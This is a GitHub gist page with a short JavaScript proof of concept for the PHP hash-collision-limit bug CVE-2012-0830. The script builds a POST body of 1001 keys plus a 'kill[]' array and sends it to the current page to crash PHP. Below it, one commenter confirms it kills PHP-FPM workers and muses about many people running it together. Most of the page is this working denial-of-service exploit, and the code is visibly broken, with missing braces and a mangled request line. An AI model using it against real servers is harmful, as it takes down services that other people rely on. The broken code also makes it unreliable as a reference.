Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// Generate 1000 normal keys and one array
function createEvilObj () {
var evil_obj = {};
for (var i = 0; i < 1001; i++) {
evil_obj[i] = 1;
evil_obj['kill[]'] = 'kill';
return evil_obj;
// Serialize Javascript object into POST data
function serializeObj (obj) {
var str = [];
for(var p in obj) {
str.push(p + "=" + obj[p]);
return str.join("&");
// Run attack
function attackSite () {
var bad = serializeObj(createEvilObj());
var xhr = new XMLHttpRequest();"POST", location.href, true);
xhr.setRequestHeader('Content-Length', bad.length);

This comment has been minimized.

Copy link

@adrian-rt adrian-rt commented Feb 2, 2012

there are actually 1001 normal keys + one array there.....


This comment has been minimized.

Copy link

@Tatsh Tatsh commented Feb 3, 2012

My server uses nginx and proxies through PHP-FPM. For one thing, Chrome refuses line 29 (at least in the console). But this does work. A call to attackSite() results in one of the PHP instances dying:

2012/02/03 10:06:42 [error] 22018#0: *692 recv() failed (104: Connection reset by peer) while reading response header from upstream

Then it is brought back up. So I guess if I had a lot of people doing this attack even with PHP-FPM there'd be some real trouble.


This comment has been minimized.

Copy link

@adrian-rt adrian-rt commented Feb 4, 2012

It was just an observation really. Can you provide some technical details about what exactly happens inside php?
I know some php internals, but not enought for this actually......Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.